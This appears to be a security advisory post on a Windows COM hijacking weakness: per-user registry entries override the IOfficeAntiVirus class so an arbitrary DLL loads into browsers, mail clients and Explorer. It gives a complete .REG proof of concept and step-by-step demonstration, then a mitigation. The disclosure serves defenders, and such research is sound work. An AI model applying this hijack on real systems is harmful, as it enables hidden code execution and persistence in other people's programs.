Hi @ll, this is the continuation of the previous posts and . (Un)fortunately the IOfficeAntiVirus interface (see ) has at least another weakness which also allows (unprivileged users) to load arbitrary DLLs into web browsers, mail/news clients, instant messengers, file explorer and every other program which calls this COM interface. With Windows 2000, Microsoft introduced the "merged view" of the [HKEY_CLASSES_ROOT] virtual registry tree: see "Thanks" to this feature, COM categories/classes/interfaces registered by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes] obscure the corresponding COM categories/classes/interfaces registered (by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] Demonstration: ~~~~~~~~~~~~~~ On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following steps (adaption for 64-bit installations is left as an exercise to the reader): 1. Log on to an arbitrary (unprivileged) user account. 2. Download and save it in an arbitrary directory. 3. Create a text file SENTINEL.REG with the following contents: --- SENTINEL.REG --- REGEDIT4 [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}] @="Vulnerability and Exploit Detector" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="MSOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32] @="\\SENTINEL.DLL" ; replace with the directory used in step 2. "ThreadingModel"="Both" ; NOTE: the following entries are optional! [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs] @="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}" [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="IOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}] @="IOfficeAntiVirus" [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface] @="{00000000-0000-0000-C000-000000000046}" ; IUnknown [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods] @="4" --- EOF --- 4. Double-click the file SENTINEL.REG to merge it into the user's registry. 5. Download an arbitrary file with your web browser, for example , or save an attachment in your mail client, and notice the message boxes displayed from the sentinels. NOTE: the batch script performs all these steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows. Mitigation: ~~~~~~~~~~~ Use AppLocker or SAFER alias Software Restriction Policies: see stay tuned, and NEVER use Windows without SAFER or AppLocker Stefan Kanthak